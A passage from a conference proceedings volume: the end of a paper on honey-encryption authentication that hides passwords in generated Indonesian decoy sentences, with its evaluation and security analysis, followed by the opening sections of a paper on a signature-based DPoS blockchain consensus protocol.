| b | 5536026 |
| hexa(b) | 54 79 1A |
| hexaGroup | [0x54, 0x79, 0x1A] |
| bigrams | 0x54: [‘g[ZWC]h’, ‘ng’, ‘[ZWC]ji’]; 0x79: [‘[ZWC][ZWC]ng’, ‘k[ZWC]l’, ‘[ZWC]ul’]; 0x1A: [‘ba’, ‘t[ZWC][ZWC]u’, ‘r[ZWC]w’] |
| First loop | |
| firstBigrams | [‘g[ZWC]h’, ‘ng’, ‘[ZWC]ji’] |
| predicateBigrams | [‘[ZWC][ZWC]ng’, ‘k[ZWC]l’, ‘[ZWC]ul’] |
| chosenSentence | me[ZWC][ZWC]ngalami diskriminasi (experienced discrimination.) |
| positionList | [2, −1] |
| onsets of name | [‘m’, ‘l’] |
| name | dulmoleen |
| finalSentence | dulmoleen me[ZWC][ZWC]ngalami diskriminasi (dulmoleen experienced discrimination.) |
| Second loop | |
| firstBigrams | [‘ba’, ‘t[ZWC][ZWC]u’, ‘r[ZWC]w’] |
| predicateBigrams | [] |
| randomized chosenSentence | menyiapkan pernikahan indy (preparing for Indy’s wedding.) |
| positionList | [−1, −1, −1] |
| onsets of name | [‘l’, ‘l’, ‘l’] |
| name | urly linlin |
| finalSentence | urly linlin menyiapkan pernikahan indy (urly linlin is preparing for Indy’s wedding.) |
| Final results | dulmoleen me[ZWC][ZWC]ngalami diskriminasi. Urly linlin menyiapkan pernikahan indy (dulmoleen experienced discrimination. Urly linlin is preparing for Indy’s wedding.) |
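The first rows of Table 6 (the 8-bit chunks) and the raw bigram candidates produced before the ZWC mapping can be reproduced with a short sketch. Two points are assumptions: letters are indexed from ‘a’ = 0, as the worked example for b = 121 implies, and only first-letter indices below 26 are kept so that each candidate stays decodable. The function names are hypothetical.

```python
import string


def split_into_chunks(b):
    """Split a non-negative integer into 8-bit chunks, most significant first."""
    length = max(1, (b.bit_length() + 7) // 8)
    return list(b.to_bytes(length, "big"))


def hex_to_bigrams(chunk):
    """Candidate bigrams for one 8-bit chunk, before the ZWC mapping (steps 1-3)."""
    quotient, j = divmod(chunk, 26)
    second = string.ascii_lowercase[j]
    # Assumption: i = quotient + 10x is kept only while it is a valid index (< 26).
    return [string.ascii_lowercase[i] + second for i in range(quotient, 26, 10)]


chunks = split_into_chunks(5536026)
print([hex(c) for c in chunks])      # ['0x54', '0x79', '0x1a']
print(hex_to_bigrams(0x79))          # ['er', 'or', 'yr']
print(hex_to_bigrams(0x1A))          # ['ba', 'la', 'va']
```

The candidates for 0x79 match the possibleBigrams of the worked example; Table 6 then shows them after each one has been replaced through mapBigramGroup.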
3.3 Login Phase

The login phase authenticates a user who tries to access the resources. First, the user sends a password (P) and a number salt to the server. Then, the server encodes the password into an integer x. After encoding the password, the server retrieves the secret confirmation message $S_{b_{db}}$ from the database and decodes it into an integer $b_{db}$. The server also retrieves the generated numbers a and n to compute the DLP equation $b = a^{x} \bmod n$. If b and $b_{db}$ are equal, the user is eligible to log in. In that case, the server encodes b into the sentence $S_{real}$ with the given salt and sends $S_{real}$ to the user as a confirmation message. On the user’s side, a new validation sentence is generated by decoding the secret message into $b_{valid}$ and then encoding $b_{valid}$ with the same salt into the new sentence $S_{valid}$. $S_{valid}$ is supposed to be the same as $S_{real}$, so the user can compare the two to confirm whether he is communicating with the legitimate server. The encoding process in the login phase uses the same algorithm explained for the sign-up phase in Sect. 3.2. The decoding algorithm is discussed in the following subsection. The details of the login phase are shown in Fig. 5.
Fig. 5. Login phase of the proposed method.
Decoding Algorithm. This section discusses an algorithm to decode a natural sentence (S) into an integer (b). The process begins by decoding the name into the positionList. Then, the bigrams are retrieved based on every position in the positionList. Finally, every bigram is decoded into the original number. The algorithm proceeds as follows:
1. Extracting the name from the sentence.
2. Decoding the name into firstBigram and positionList. This is done by parsing the name into syllables, using the syllabification rules explained in the preprocessing phase (Sect. 3.1). The first syllable is then decoded into firstBigram, and every syllable’s onset is decoded into positionList using a reversed onsetList map. The onsetList is a lookup table prepared in the name preprocessing phase (Sect. 3.1).
3. For every pos in the positionList, fetching the bigram at index pos in the sentence.
4. Reversing every bigram into its original bigram. This is done by counting the ZWCs in the bigram and recovering the original bigram from the reversed mapBigramGroup. The mapBigramGroup is a lookup table that maps every bigram and its ZWC count to a new representative bigram; it is prepared in the sentence preprocessing phase.
5. Converting every original bigram into an eight-bit integer NUM. Suppose we have the bigram ‘AB’ and ord(x) is a function that returns the order of the letter x in the alphabet. Then, NUM is computed using Eq. 2:
\[ NUM = i + j \tag{2} \]
where $i = (\mathrm{ord}(A) \bmod 10) \cdot 26$ and $j = \mathrm{ord}(B)$.
6. Arranging every 8-bit integer NUM consecutively into a final integer b.
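Steps 5 and 6 of the decoding algorithm can be checked with a small sketch. It assumes that ord() counts letters from ‘a’ = 0, which is the convention that makes Eq. 2 invert the encoding example (‘er’, ‘or’, and ‘yr’ all decode to 121); the function names are hypothetical.

```python
def letter_order(letter):
    """Order of a lowercase letter in the alphabet, assuming 'a' = 0."""
    return ord(letter) - ord("a")


def bigram_to_num(bigram):
    """Eq. 2: NUM = (ord(A) mod 10) * 26 + ord(B) for the bigram 'AB'."""
    i = (letter_order(bigram[0]) % 10) * 26
    j = letter_order(bigram[1])
    return i + j


def assemble(nums):
    """Step 6: concatenate the 8-bit values, most significant first."""
    b = 0
    for num in nums:
        b = (b << 8) | num
    return b


nums = [bigram_to_num(bg) for bg in ("ng", "er", "ba")]
print(nums, assemble(nums))   # [84, 121, 26] 5536026
```

The three bigrams used here are the original (pre-ZWC) bigrams behind the chunks 0x54, 0x79, and 0x1A of Table 6, so the assembled value is the b of that example.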
4 Discussion

This section discusses the performance evaluation of the proposed method in preventing password-guessing attacks. The proposed method is evaluated on two aspects: the naturalness of the generated sentences and the security against password-guessing attacks. These aspects are discussed in the following subsections.

4.1 Naturalness Evaluation

Since the proposed method has to generate an indistinguishable confirmation message, it is evaluated by the naturalness of the generated sentences. This evaluation relies on Indonesian grammar rules and the contextual relation of the words in the sentence. A sentence is considered natural if it is grammatically correct and the subject, predicate, and object are contextually related. The evaluation scenario is as follows:
1. Randomly choosing 100 passwords from the password database. The password database used in this experiment is the RockYou password list [13], which consists of over 32 million user passwords from the website “www.rockyou.com”.
2. Generating two random numbers (a and n) that are suitable for the DLP for each password, where n is a randomly generated 24-bit number and a is a random number that satisfies gcd(a, n) = 1 and a < n.
3. Generating natural language sentences from each password.
4. Categorizing every generated sentence into three categories:
a. The sentence is grammatically correct, and the words are contextually related.
b. The sentence is grammatically correct, but the words are not contextually related.
c. The sentence is grammatically incorrect.
5. Repeating steps 2 to 4 three times. This step is conducted to check the fidelity of the proposed method.

Based on the results shown in Fig. 6, the proposed method can create sentences that are considered natural: 80.67% of the generated sentences are grammatically correct with contextually related words. However, 3% of the generated sentences are not contextually related even though the grammar is correct. This occurs because several sentences use a predicate that has more than one meaning and grammatical function, so that the predicate and object are not related to the subject (e.g., the word “sampai” can be translated as the verb “arrive” or the preposition “until”). The remaining 16.33% of the generated sentences are grammatically incorrect, with two types of grammar errors. The first type occurs when the sentence uses a non-predicate word as the predicate, because several non-predicate words begin with “ber-” or “me-” and are mislabeled as predicates in the sentence preprocessing phase (Sect. 3.1). The second type occurs when the generated sentence is incomplete, because the sentence was not correctly parsed in the preprocessing phase (Sect. 3.1).
Fig. 6. The percentage of the experiment results for each category in every generation.
4.2 Security Analysis

In the attack scenario of the proposed method (Fig. 7), the server receives an incorrect password (P’) from the attacker. The password is encoded into an integer x’. The server retrieves the secret confirmation message $S_{b_{db}}$ from the database and decodes it into an integer $b_{db}$. The server also retrieves the generated numbers a and n from the database to compute the DLP equation $b' = a^{x'} \bmod n$. Since b’ and $b_{db}$ are unequal, the user is not eligible to log in. Then, a random number rand is generated and a fake value $b_{fake}$ is computed as $b_{fake} = a^{x' + rand} \bmod n$. $b_{fake}$ is encoded into a natural sentence, which is sent to the intruder as a fake confirmation message ($S_{fake}$). The server also sends an alert to the administrator.
Fig. 7. Attack scenario of the proposed method.
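The server-side decision in the login and attack scenarios can be sketched numerically. This is only an illustration of the two branches: the range from which rand is drawn is an assumption (the text only says a random number is generated), the sentence encoding and the administrator alert are left out, and `server_response` is a hypothetical name.

```python
import secrets


def server_response(x_guess, a, n, b_db, rand=None):
    """Return ("real", b) for a matching password, otherwise ("fake", b_fake)."""
    b = pow(a, x_guess, n)
    if b == b_db:
        return "real", b
    if rand is None:
        # Assumption: rand is drawn uniformly from 1 .. n - 1.
        rand = secrets.randbelow(n - 1) + 1
    # b_fake = a^(x' + rand) mod n, as in the attack scenario.
    return "fake", pow(a, x_guess + rand, n)


# Toy parameters for illustration only; real values would be far larger.
a, n = 3, 7
b_db = pow(a, 120, n)
print(server_response(120, a, n, b_db))          # correct guess
print(server_response(121, a, n, b_db, rand=2))  # wrong guess, fixed rand
```

In both branches the caller receives a value of the same form, which is the property the scheme relies on: the response by itself does not reveal whether the guess was right.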
To prevent password-guessing attacks, the security depends on the probability of the attacker finding the correct password among all possible passwords. In the proposed method, every password is sent with a salt. Thus, the total number of possible passwords is the product of the total number of password combinations and the maximum value of the salt for each password:
\[ \text{total possible passwords}_{proposed} = \text{total password combination} \cdot \text{maximum salt} \tag{3} \]
Suppose the number of bits used in the password is $n_{bits}$ and every bit can take the value 1 or 0. Then the total password combination in the proposed method is calculated using Eq. 4:
\[ \text{total password combination} = 2^{n_{bits}} \tag{4} \]
Since the salt is used to determine the order of the generated sentences, the maximum value of the salt depends on the total number of possible generated sentences for each password. Suppose every eight bits of the password are converted into $n_{bigram}$ bigrams,
every bigram is mapped into $n_{predicate}$ predicates, and every predicate is mapped into $n_{object}$ objects; then the maximum value of the salt is calculated using Eq. 5:
\[ \text{maximum salt} = \frac{n_{bits} \cdot n_{bigram} \cdot n_{predicate} \cdot n_{object}}{8} \tag{5} \]
By substituting Eq. 4 and Eq. 5 into Eq. 3, the total number of possible passwords is calculated using Eq. 6:
\[ \text{total possible passwords} = 2^{(n_{bits} - 3)} \cdot n_{bits} \cdot n_{bigram} \cdot n_{predicate} \cdot n_{object} \tag{6} \]
The attacker cannot determine whether the guessed password is correct when he does not know $n_{bigram}$, $n_{predicate}$, and $n_{object}$. Thus, the probability of finding the correct password among the total possible passwords is calculated using Eq. 7:
\[ \text{probability of finding the correct password} = \frac{1}{2^{(n_{bits} - 3)} \cdot n_{bits} \cdot n_{bigram} \cdot n_{predicate} \cdot n_{object}} \tag{7} \]
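Eqs. 3 to 7 can be evaluated directly to see how the terms combine. The parameter values in the example below are hypothetical and chosen only to make the arithmetic easy to follow; the paper does not report measured values for the numbers of bigrams, predicates, or objects. Exact fractions are used so the division by 8 in Eq. 5 introduces no rounding.

```python
from fractions import Fraction


def maximum_salt(n_bits, n_bigram, n_predicate, n_object):
    """Eq. 5: number of sentence variants available per password."""
    return Fraction(n_bits * n_bigram * n_predicate * n_object, 8)


def total_possible_passwords(n_bits, n_bigram, n_predicate, n_object):
    """Eqs. 3, 4 and 6: password combinations multiplied by the maximum salt."""
    return 2 ** n_bits * maximum_salt(n_bits, n_bigram, n_predicate, n_object)


def guess_probability(n_bits, n_bigram, n_predicate, n_object):
    """Eq. 7: chance that a single guess hits the correct password and salt."""
    return 1 / total_possible_passwords(n_bits, n_bigram, n_predicate, n_object)


# Hypothetical example values: 24-bit password, 3 bigrams per chunk,
# 10 predicates per bigram, 5 objects per predicate.
params = (24, 3, 10, 5)
print(maximum_salt(*params))               # 450
print(total_possible_passwords(*params))   # 7549747200
print(guess_probability(*params))          # 1/7549747200
```

With these example values the salt multiplies the plain $2^{24}$ search space by 450, which is the sense in which the sentence-based scheme enlarges the space an attacker has to cover.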
Compared to the previous methods [4, 5], the proposed method increases the complexity of password-guessing attacks. The previous methods generate the honey message from a single word, while the proposed method generates the honey message from sentences. The previous methods have to store all possible passwords and honey messages in the database, so their security is limited by the amount of data that can be stored and consumes many resources. Meanwhile, the proposed method dynamically generates sentences from one seed sentence, so it only needs to store one sentence. Based on the total number of possible passwords, the probability of finding the correct password in the proposed method is also lower than in the previous methods.
5 Conclusion and Future Research

As discussed in Sect. 1, this research aims to increase the security of honey encryption in authentication schemes against password-guessing attacks. This problem can be addressed by creating a honey sentence as a fake message. Instead of rejecting the unauthorized request, the honey sentence is sent to fool the attacker. In Mohammed’s and Jordan’s methods, all the fake messages are stored in the database, which consumes many resources. The fake message is also generated from a single word, which raises the suspicion of the attacker. This research proposes an authentication scheme that generates honey sentences using natural language. The honey sentence is dynamically generated: one password or one seed sentence can generate multiple sentences. Because the proposed method creates a honey message from sentences, it raises less suspicion from the attacker than Mohammed’s and Jordan’s methods, which use words. The experimental results show that 80.67% of the generated sentences are considered natural, so the naturalness of this method is good enough and can be enhanced in future work. Furthermore, in the proposed method, the complexity of generating all possible passwords is multiplied by the number of honey sentences that can be generated,
such that the probability of finding the correct password from all possible passwords is lower than in Mohammed’s and Jordan’s methods. The proposed method also increases the attack complexity compared with Mohammed’s and Jordan’s methods by dynamically generating the honey message from one sentence. Consequently, the proposed method only needs to store one sentence, and the security is not limited by the number of fake messages that can be stored. In future work, this research can be improved by analyzing the context between sentences in the honey message, so that the message is contextually related when it consists of more than one sentence. In addition, other methods of preprocessing and constructing honey sentences can be explored to enhance the naturalness of the generated sentences.
References

1. Bonneau, J., Herley, C., Van Oorschot, P.C., Stajano, F.: The quest to replace passwords: a framework for comparative evaluation of web authentication schemes. In: 2012 IEEE Symposium on Security and Privacy, pp. 553–567. IEEE, New York (2012)
2. Wang, X., Yan, Z., Zhang, R., Zhang, P.: Attacks and defenses in user authentication systems: a survey. J. Netw. Comput. Appl. 188, 103080 (2021)
3. Juels, A., Ristenpart, T.: Honey encryption: security beyond the brute-force bound. In: Nguyen, P.Q., Oswald, E. (eds.) EUROCRYPT 2014. LNCS, vol. 8441, pp. 293–310. Springer, Heidelberg (2014). https://doi.org/10.1007/978-3-642-55220-5_17
4. Kurnaz, S., et al.: Secure pin authentication in java smart card using honey encryption. In: 2020 International Congress on Human-Computer Interaction, Optimization and Robotic Applications (HORA), pp. 1–4. IEEE, New York (2020)
5. Honey Encryption. https://medium.com/smucs/honey-encryption-e56737af081c. Accessed 31 June 2022
6. Moeliono, A.M., et al.: Tata bahasa baku bahasa Indonesia, 4th edn. Badan Pengembangan dan Pembinaan Bahasa, Jakarta (2017)
7. Goldhahn, D., Eckart, T., Quasthoff, U.: Building large monolingual dictionaries at the Leipzig corpora collection: from 100 to 200 languages. In: Proceedings of the 8th International Language Resources and Evaluation (LREC 2012). ELRA, Turkey (2012)
8. Kbbi, K.B.B.I.: Kamus Besar Bahasa Indonesia (KBBI). Kementerian Pendidikan Dan Budaya, Jakarta (2016)
9. Name Corpus. http://www-2.cs.cmu.edu/afs/cs/project/ai-repository/ai/areas/nlp/corpora/names/. Accessed 31 July 2022
10. English Surnames from 1849. https://www.kaggle.com/datasets/vinceallenvince/engwalessurnames. Accessed 31 July 2022
11. Anderson, C.: Essentials of linguistics. McMaster University, Hamilton (2018)
12. McCurley, K.S.: The discrete logarithm problem. In: Proceedings of Symposium in Applied Math, pp. 49–74. AMS, Providence (1990)
13. RockYou Wordlist. https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt. Accessed 31 July 2022
HSDVS-DPoS: A Secure and Heterogeneous DPoS Consensus Protocol Using Heterogeneous Strong Designated Verifier Signature

Can Zhao, XiaoXiao Wang, Zhengzhu Lu, Jiahui Wang, Dejun Wang, and Bo Meng

School of Computer Science, South-Central Minzu University, Wuhan, China
Abstract. With the rapid development of blockchain, in which nodes may use different cryptographic mechanisms to achieve secure consensus, research on secure and heterogeneous consensus protocols is becoming a hot issue. Based on the idea of electronic voting, coercion-resistance and receipt-freeness are introduced into the consensus protocol to prevent vote buying and candidate cheating. Then, a secure and heterogeneous DPoS consensus protocol using heterogeneous designated verifier signature is presented, which provides authentication, secrecy, anonymity, fairness, coercion-resistance, verifiability, and receipt-freeness. The proposed DPoS consensus protocol is implemented on the Eclipse platform using the Java language. The experimental results show that the throughput and the block production time stay stable when the number of nodes is between 15 and 5000.

Keywords: Heterogeneous designated verifier signature · DPoS consensus protocol · Coercion-resistance · Receipt-freeness
1 Introduction
Consensus protocols, for example PoW (Proof of Work) [1], PoS (Proof of Stake) [2], DPoS (Delegated Proof of Stake) [3], PoPF (Proof of Participation and Fees) [4], PBFT (Practical Byzantine Fault Tolerance) [5] and Raft [6], form the backbone of blockchain by helping all the nodes in the network verify transactions. Among them, DPoS is widely used in important blockchains, including BitShares [7] and EOS [8]. In 2014, Larimer [3] proposed the idea of the DPoS consensus protocol, which employs stake as evidence for voting rather than as an opportunity to mine. In 2020, Xu [9] put forward a kind of vague set to enhance the security and fairness of the DPoS consensus protocol by allowing each node to select an agent node. In 2021, Liu [10] used the Probabilistic Linguistic Term Set to improve the efficiency and flexibility of the DPoS consensus protocol by adding voting options for nodes. In the same year, Hu [11] designed a novel hybrid consensus mechanism that combines High Quality DPoS with an improved PBFT algorithm to enhance the security of the DPoS consensus protocol. However, these DPoS consensus protocols [3, 9–11] do not consider vote buying or candidate cheating.
© The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 K. Arai (Ed.): FICC 2023, LNNS 652, pp. 541–562, 2023. https://doi.org/10.1007/978-3-031-28073-3_38
At the same time, as blockchain applications become more complex, nodes may use different cryptographic mechanisms to establish secure communication and reach consensus. The DPoS consensus protocols above do not support a heterogeneous cryptography communication mechanism [12]. Hence, HSDVS-DPoS, a secure and heterogeneous DPoS consensus protocol using the heterogeneous designated verifier signature, is proposed to solve the above problems. The main contributions of this paper are as follows:
1. Based on the ideas of electronic voting, coercion-resistance and receipt-freeness are introduced into a consensus protocol. A secure and heterogeneous DPoS consensus protocol (HSDVS-DPoS) using a heterogeneous designated verifier signature is then presented, which provides authentication, secrecy, anonymity, fairness, coercion-resistance, verifiability and receipt-freeness.
2. The HSDVS-DPoS consensus protocol is implemented on the Eclipse platform using the Java language. The experimental results show that the throughput and the block production time remain stable as the number of nodes ranges from 15 to 5000. When the number of nodes exceeds 5000, the throughput decreases and block production becomes less efficient.
2 Related Work
In this section, the DPoS consensus protocol, heterogeneous blockchain and IoB are discussed. Larimer proposed the idea of DPoS in 2014, which employs stake as evidence for voting rather than as an opportunity to mine. In the DPoS consensus protocol, stakeholders elect witnesses by voting. A stakeholder cannot vote for more decentralization than the number of witnesses for which they actually cast votes. Each account is allowed one vote per share per witness, a process known as the approval voting mechanism. The top N witnesses by total approval votes are selected. The main difference between DPoS and PoS is that DPoS represents democracy. Its typical applications include BitShares and EOS. In 2018, Fan et al. [13] proposed Roll-DPoS, in which the core of reaching consensus in each period is the PBFT algorithm. Roll-DPoS initiates a candidate pool through a community voting process with the help of the Ethereum blockchain, and the nodes that receive the most votes from the community become the potential block producers. In the same year, Snider [14] concluded that DPoS is a method of providing security to a crypto-currency network through the approval voting of delegates, but that it has problems such as low voter turnout, bribing attacks, large-scale attacks, collusion of block producers, candidate cheating and distributed denial of service (DDoS) attacks. In 2019, Huang et al. [15] introduced a fusing mechanism to eliminate evil nodes in DPoS, and a credit mechanism to reduce the possibility of evil nodes. In 2021, Liu [16] adopted the K-means algorithm to select good nodes in the agent queue in advance, in order to prevent centralization and to reduce the probability of malicious nodes being selected in the DPoS consensus protocol. In 2022, Wen [17] proposed a novel combined analysis method for evaluating the effectiveness of the DPoS consensus protocol.
Research on heterogeneous blockchains mainly focuses on the identity authentication of user nodes under cross-chain communication, but it does not involve secure communication between different roles in a heterogeneous cryptosystem environment within a consensus protocol. In 2018, Ma et al. [18] proposed a novel cross-domain authentication scheme based on blockchain technology, which has good practicability in domain authentication. In 2019, Li et al. [19] discussed the necessity and the method of constructing a transaction system for multi-energy systems based on heterogeneous blockchain technology in order to address the constraints of blockchain. In the same year, Dong et al. [20] studied the cross-domain authentication credibility of heterogeneous blockchains. IoB refers to communication between different blockchain networks that connects their services, strengthens the connection between blockchains and improves interoperability across blockchains. In 2018, Vo et al. [21] envisioned the concept of IoB. In 2019, Li et al. [22] argued that the coexistence of different types of blockchain applications is a common phenomenon, and that cross-chain technology is important for blockchains to realize interoperability and enhance scalability. In the same year, Alexei et al. [23] provided the first systematic exposition of CCC (cross-chain communication) protocols and showed that realizing CCC without a trusted third party is impossible. In addition, they introduced a framework for evaluating existing cross-chain communication protocols and designing new ones. In 2021, Shao [24] proposed an Identity-Based Encryption based cross-chain communication mechanism for blockchain to implement security authentication and cross-chain communication.
3 Preliminaries
3.1 Heterogeneous Strong Designated Verifier Signature Based on PKI and IBC
A heterogeneous Strong Designated Verifier Signature (SDVS) is used in heterogeneous cryptography communication, in which the communicating parties, Alice and Bob, use different cryptosystems. The signer Alice sends a signature to the receiver Bob, who is the designated verifier. Only Bob can verify the validity of the signature, using his secret key. A heterogeneous SDVS based on Public Key Infrastructure (PKI) and Identity-based Cryptography (IBC) [12] has correctness, non-transferability, unforgeability, strongness, source hiding and non-delegatability. Here, we use it to achieve coercion-resistance and receipt-freeness in the DPoS consensus protocol. The heterogeneous SDVS scheme based on PKI and IBC is composed of five algorithms:
• Setup: accepts a security parameter as input, produces the system parameters, the master public key and the master private key, and publishes the system public parameters.
• KeyGen: generates the public key and private key for the communicating parties, who are in the PKI and IBC cryptosystems, respectively.
• SDVS Signature: generates a signature for the designated verifier.
• SDVS Verification: verifies the signature.
• Transcript Simulation: generates a signature simulation.
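To make the roles of the five algorithms more concrete, the following is a minimal Python sketch of a toy designated verifier signature. It is not the heterogeneous PKI/IBC scheme of [12]: as a simplifying assumption, both parties use the same Diffie-Hellman group, and the signature is an HMAC under the key shared by the signer and the designated verifier. The modulus P, the base G and all function names are hypothetical, and the parameters are far too weak for real use. The sketch only illustrates two properties named above: verification needs the verifier's private key, and the verifier can produce a transcript that passes the same check.

```python
import hashlib
import hmac
import secrets

# Setup (assumption): toy public parameters, a Mersenne prime modulus and a small base.
P = 2**127 - 1
G = 3

def keygen():
    """KeyGen: return (private key, public key) with pk = G^sk mod P."""
    sk = secrets.randbelow(P - 3) + 2
    return sk, pow(G, sk, P)

def _shared_key(own_sk, peer_pk):
    """Key that only the signer and the designated verifier can derive."""
    shared = pow(peer_pk, own_sk, P)
    return hashlib.sha256(shared.to_bytes(16, "big")).digest()

def sdvs_sign(sk_signer, pk_verifier, message):
    """SDVS Signature: tag the message under the shared key."""
    return hmac.new(_shared_key(sk_signer, pk_verifier), message, hashlib.sha256).digest()

def sdvs_verify(sk_verifier, pk_signer, message, sigma):
    """SDVS Verification: requires the verifier's private key."""
    expected = hmac.new(_shared_key(sk_verifier, pk_signer), message, hashlib.sha256).digest()
    return hmac.compare_digest(expected, sigma)

def transcript_simulate(sk_verifier, pk_signer, message):
    """Transcript Simulation: the verifier produces a tag that also verifies."""
    return hmac.new(_shared_key(sk_verifier, pk_signer), message, hashlib.sha256).digest()
```

In this toy construction the simulated transcript is bit-for-bit equal to the signer's tag, which is why a third party cannot tell which of the two parties produced it. A real SDVS scheme achieves indistinguishability without the two values having to be identical.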
4 Proposed HSDVS-DPoS Consensus Protocol
In order to address vote buying, candidate cheating and the lack of support for heterogeneous cryptography communication, coercion-resistance and receipt-freeness are introduced into the consensus protocol based on the ideas of electronic voting. A secure and heterogeneous DPoS consensus protocol (HSDVS-DPoS) is then presented using the heterogeneous strong designated verifier signature. The HSDVS-DPoS consensus protocol in Fig. 1 includes a registration phase, a voting phase, a counting phase and a block production phase. The heterogeneous designated verifier signature is adopted in the voting phase and the counting phase. The first phase is the registration phase, in which the registration node R generates the list of witness candidate nodes ListW, queries the Token of stakeholder node S using S's address, and then sends the list of stakeholder nodes ListS, which includes S's basic information, to the counting node C. The second phase is the voting phase, in which a stakeholder node S generates a Ballot for ListW and sends it to the counting node C. The third phase is the counting phase, in which the counting node C counts the Ballots and publishes the results, the signatures for Ballots and the signature simulations with Ballots. The final phase is the block production phase, in which witness nodes produce blocks.
Fig. 1. Flowchart.
In the following, the symbols, the data structure of Ballot, the rules of counting ballots, the roles, the framework and the phases are presented.
4.1 Roles
The roles in Fig. 2 include ordinary node, stakeholder node, witness candidate node, witness node, block producer node, registration node and counting node. The characteristics of the nodes are:
1. Ordinary node: a node in the distributed network.
2. Stakeholder node: an ordinary node that holds stake. Stakeholder nodes vote for witness candidate nodes in ListW.
3. Witness candidate node: the object of a stakeholder node's vote. Witness candidate nodes are drawn from the stakeholder nodes.
4. Witness node: the top N witness candidate nodes in the statistical results of the counting phase are selected as witness nodes to produce blocks.
5. Block producer node: a witness node that participates in the block production phase. These nodes produce blocks and verify transactions.
6. Registration node: the node that does the following work.
• Scan the information of the witness candidate nodes to form a list named ListW.
• Check whether the Token is greater than 0 according to the address of the stakeholder node. If the Token is greater than 0, the stakeholder node is qualified, and a blank electronic ballot including ListW is sent to it.
• Scan the basic information of the stakeholder nodes to form a list named ListS, and send the blank electronic ballot to the counting node. ListS gives the counting node a basis for verifying the identity of the stakeholder nodes and counting the received votes in the counting phase.
7. Counting node: the node that counts and releases votes. It cleans up invalid ballots, counts valid ballots, and releases the statistical results, the signatures with ballots and the signature simulations with ballots.
Fig. 2. Roles.
4.2 Relationship of Roles
The relationship of roles concerns role transformation, as shown in Fig. 3.
1. An ordinary node is transformed into a stakeholder node if it holds Token.
2. A stakeholder node votes for witness candidate nodes in ListW. The counting node starts counting votes when the timestamp that ends the voting phase is reached, and the top N witness candidate nodes in the statistical results are transformed into witness nodes.
Fig. 3. Relationship of roles (edge labels: hold token; vote for; select the top N according to voting results; produce block)
3. A witness node is transformed into a block producer node if it participates in the block production phase.
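The three transformations above can be sketched as small Python functions. This is only an illustration under stated assumptions: the `Role` enum and the function names are hypothetical, and the ranking of candidates is taken as already computed by the counting node.

```python
from enum import Enum

class Role(Enum):
    ORDINARY = "ordinary node"
    STAKEHOLDER = "stakeholder node"
    WITNESS_CANDIDATE = "witness candidate node"
    WITNESS = "witness node"
    BLOCK_PRODUCER = "block producer node"

def after_registration(token):
    """An ordinary node becomes a stakeholder node if it holds Token (> 0)."""
    return Role.STAKEHOLDER if token > 0 else Role.ORDINARY

def after_counting(candidate_id, ranked_candidates, n):
    """The top N witness candidate nodes in the results become witness nodes."""
    if candidate_id in ranked_candidates[:n]:
        return Role.WITNESS
    return Role.WITNESS_CANDIDATE

def after_joining_production(role):
    """A witness node becomes a block producer node when it takes part in block production."""
    return Role.BLOCK_PRODUCER if role is Role.WITNESS else role
```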
4.3 Data Structure
The symbols and their meanings are listed in Table 1.
Table 1. Symbol and meaning
Symbol | Meaning
R | Registration node
S | Stakeholder node
C | Counting node
WitCan | Witness candidate node
Witness | Witness node
Token | Stake
IDj, j = 1, 2, ..., n | Identity of stakeholder node S
IDi, i = 1, 2, ..., n | Identity of witness candidate node
Ballot | Ballot information
ListS | List of stakeholder nodes S
ListW | List of witness candidate nodes
s | Signature generated by a stakeholder node in Fig. 1
s' | Signature simulation generated by a counting node C
Node | Node information
krc | Shared key between registration node R and counting node C
sks | Private key of stakeholder node S
skc | Private key of counting node C
The information of a node includes a public key PK, a private key SK and an Address. PK and Address are public; SK is private and is used to consume assets and generate signatures. An asset is available to anyone who knows SK, because consuming an asset requires the private key. The data structure of a node is shown in Fig. 4.
Fig. 4. A node (fields: public key PK, private key SK, Address)
ListS in Fig. 5 includes IDj and Tokenj information, in which IDj means identity of Sj, Tokenj means stake of Sj.
Fig. 5. ListS (fields: identity of stakeholder node IDj, Tokenj)
ListW in Fig. 6 includes IDi and PKi information, in which IDi means identity of Witcani, PKi means public key of Witcani.
Fig. 6. ListW (fields: identity of witness candidate node IDi, public key of witness candidate node PKi)
The data item s in Fig. 7 consists of σ = sig(PK_S, SK_S, PK_C) and m. It denotes the signature generated by a stakeholder node on a Ballot: σ = sig(PK_S, SK_S, PK_C) is the signature generated by the stakeholder node, and m is an arbitrary message sent by the stakeholder node. PK_S is the public key of S, SK_S is the private key of S, and PK_C is the public key of C. Because the heterogeneous strong designated verifier signature scheme is applied, the signer and the designated verifier are in heterogeneous cryptography environments. It is assumed that the stakeholder node, which belongs to the PKI cryptosystem, is the signer, and that the counting node, which belongs to the IBC cryptosystem, is the designated verifier. A stakeholder node generates a signature and then sends the signature and the Ballot to the designated verifier. The counting node verifies the validity of the signature s on the Ballot; if verification succeeds, it accepts the Ballot, otherwise it rejects it.
Fig. 7. s (fields: m, σ = sig(PK_S, SK_S, PK_C))
Ballot in Fig. 8 includes ListW, state and timestamp. Each witness candidate node on ListW has a state, and a change in the value of state reflects a stakeholder node's vote. The default value of state is 0. If a stakeholder node votes for a node on ListW, the state value of that node is set to 1. The length of each state is 1 bit, and the position of the state bit corresponds to the identity IDi of the witness candidate node. Whether a stakeholder node has participated in voting is determined by whether a state value is 1.
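As an illustration of this layout, a Ballot can be sketched as a small Python data class. The class, field and method names are hypothetical, and the candidate identities are represented as plain strings for brevity.

```python
from dataclasses import dataclass, field

@dataclass
class Ballot:
    list_w: list                                # identities ID_i of the witness candidate nodes
    state: list = field(default_factory=list)   # one state bit per entry of list_w
    timestamp: float = 0.0                      # time the ballot is sent to the counting node

    def __post_init__(self):
        # A blank ballot starts with every state bit at the default value 0.
        if not self.state:
            self.state = [0] * len(self.list_w)

    def vote_for(self, candidate_id):
        """Set the state bit whose position corresponds to the candidate's identity."""
        self.state[self.list_w.index(candidate_id)] = 1

    def has_voted(self):
        """A stakeholder node has voted if some state bit is 1."""
        return 1 in self.state
```

For example, voting for the second of three candidates turns the state from `[0, 0, 0]` into `[0, 1, 0]`.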
Fig. 8. Ballot (fields: ListW, state corresponding to ListW, timestamp)
Timestamp is the time when a ballot is sent to the counting node. If timestamp ≤ deadline holds, the ballot is valid and is counted; otherwise, the ballot is invalid and is not counted.
4.4 Consensus Phases
